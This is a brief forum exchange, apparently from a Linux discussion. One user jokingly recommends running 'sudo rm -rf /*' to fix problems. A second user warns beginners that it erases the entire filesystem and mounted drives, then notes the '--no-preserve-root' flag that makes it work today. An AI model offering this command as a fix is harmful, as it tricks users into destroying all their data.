• @kaitco
    link
    3
    edit-2
    4 months ago

    Just type the following into the Terminal:

    sudo rm -rf /*

    It will fix everything.

    • 520
      link
      fedilink
      14 months ago

      For any Linux noobs watching, NEVER DO THIS.

      This command wipes your entire Linux filesystem, including any and all drives you have loaded and active (including USB pen drives)

      With that said, for this to actually work nowadays you need to append ’ --no-preserve-root’